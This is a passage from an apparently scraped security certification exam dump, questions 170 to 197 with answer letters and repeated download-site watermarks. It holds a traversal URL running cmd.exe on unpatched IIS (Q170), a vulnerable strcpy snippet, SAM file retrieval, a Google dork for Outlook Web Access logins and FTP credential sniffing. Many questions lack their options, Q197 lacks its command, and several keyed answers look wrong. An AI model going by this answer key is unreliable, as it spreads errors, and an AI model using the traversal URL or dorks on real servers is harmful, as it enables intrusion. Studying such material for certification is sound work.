Explanation
Explanation/Reference:
QUESTION 170
What will the following URL produce in an unpatched IIS Web Server?
http://www.thetargetsite.com/scripts/..% co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 171
What is kept in the following directory? HKLM\SECURITY\Policy\Secrets
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 172
Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer
to find the file?
A. %systemroot%\system32\LSA
B. %systemroot%\system32\drivers\etc
C. %systemroot%\repair
D. %systemroot%\LSA
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 173
You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?
A. allinurl:"exchange/logon.asp"
B. intitle:"exchange server"
C. locate:"logon page"
D. outlook:"search"
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 174
When setting up a wireless network with multiple access points, why is it important to set each access point on a different channel?
A. Multiple access points can be set up on the same channel without any issues
B. Avoid over-saturation of wireless signals
C. So that the access points will work on different frequencies
D. Avoid cross talk
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 175
You are running through a series of tests on your network to check for any security vulnerabilities.
After normal working hours, you initiate a DoS attack against your external firewall. The firewall Quickly freezes up and becomes unusable. You then initiate an
FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What
has happened?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 176
You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager
of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's
network. How would you answer?
A. Microsoft Methodology
B. Google Methodology
C. IBM Methodology
D. LPT Methodology
Correct Answer: D
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 177
Software firewalls work at which layer of the OSI model?
A. Application
B. Network
C. Transport
D. Data Link
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 178
After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, stateful firewall, NAT, IPSEC, and a packet
filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 179
Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a
server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to
download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable?
A. Entrapment
B. Enticement
C. Intruding into a honeypot is not illegal
D. Intruding into a DMZ is not illegal
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 180
You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain
Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 181
What are the security risks of running a "repair" installation for Windows XP?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 182
Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls
and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set.
What is Terri trying to accomplish by sending this IP packet?
A. Trick the switch into thinking it already has a session with Terri's computer
B. Poison the switch's MAC address table by flooding it with ACK bits
C. Crash the switch with a DoS attack since switches cannot send ACK bits
D. Enable tunneling feature on the switch
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 183
You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com
and find the following information for an open position: 7+ years experience in Windows Server environment 5+ years experience in Exchange 2000/2003
environment Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are required MCSA desired, MCSE, CEH
preferred No Unix/Linux Experience needed What is this information posted on the job website considered?
Correct Answer: C
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 184
The objective of this act was to protect consumers' personal financial information held by financial institutions and their service providers.
A. Gramm-Leach-Bliley Act
B. Sarbanes-Oxley 2002
C. California SB 1386
D. HIPAA
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 185
Why is it a good idea to perform a penetration test from the inside?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 186
Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing
research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search.
link:www.ghttech.net What will this search produce?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. All sites that ghttech.net links to
B. All sites that link to ghttech.net
C. All search engines that link to .net domains
D. Sites that contain the code: link:www.ghttech.net
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 187
Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user
connected to his Web server. Why will Jonathan not succeed?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 188
A packet is sent to a router that does not have the packet destination address in its route table. How will the packet get to its proper destination?
Correct Answer: C
Section: (none)
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation
Explanation/Reference:
QUESTION 189
James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of
DoS attack is James testing against his network?
A. Smurf
B. Trinoo
C. Fraggle
D. SYN flood
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 190
Kyle is performing the final testing of an application he developed for the accounting department.
His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?
#include #include int main(int argc, char
*argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, "USAGE: %s string\n", argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; }
A. Buffer overflow
B. SQL injection
C. Format string bug
D. Kernal injection
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 191
You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to
mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using
virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that
you are testing?
A. Polymorphic
B. Metamorphic
C. Oligomorhic
D. Transmorphic
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 192
What is a good security method to prevent unauthorized users from "tailgating"?
A. Man trap
B. Electronic combination locks
C. Pick-resistant locks
D. Electronic key systems
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 193
You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned
by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to
get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP
packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. Airsnort
B. Snort
C. Ettercap
D. RaidSniff
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 194
As a security analyst, you setup a false survey website that will require users to create a username and a strong password. You send the link to all the employees
of the company. What information will you be able to gather?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 195
Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florid a. They have given her
permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting
firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's
network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information.
After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use?
A. Social Validation
B. Scarcity
C. Friendship/Liking
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
D. Reciprocation
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 196
Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the
servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold? needs?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 197
What will the following command accomplish?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online